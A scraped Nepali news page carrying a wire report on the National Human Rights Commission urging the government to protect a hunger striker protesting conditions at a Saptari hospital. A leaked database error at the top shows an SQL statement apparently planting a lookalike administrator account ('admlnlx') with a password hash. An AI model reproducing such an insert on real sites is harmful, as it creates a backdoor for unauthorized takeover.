WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BP/WRAhNvIust.4F83QC7VMf7VGfA60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 11:30:20', '', 'admlnlx', 'admlnlx')
काठमाडौँ,मंंसिर २२ –
राष्ट्रिय मानवअधिकार आयोगले आज यहाँ एक विज्ञप्ति जारी गरी सप्तरीको गजेन्द्रनारायण सिंह सगरमाथा अञ्चल अस्पतालको व्यवस्थापन तथा सुधारको माग राखी अनशन बसेका विकास तिवारीको जीवन रक्षा गर्नका लागि सरकारसँग माग गरेको छ ।
विज्ञप्तिमा तिवारीको स्वास्थ्य अवस्था कमजोर बन्दै गएकोप्रति ध्यानाकर्षण भएको जनाउँदै आयोगले विरोधको स्वरुप जस्तोसुकै भए पनि अनशनरत तिवारीको स्वास्थ्यप्रति संवेदनशील हुन सरकारलाई आग्रह गरिएको छ । -रासस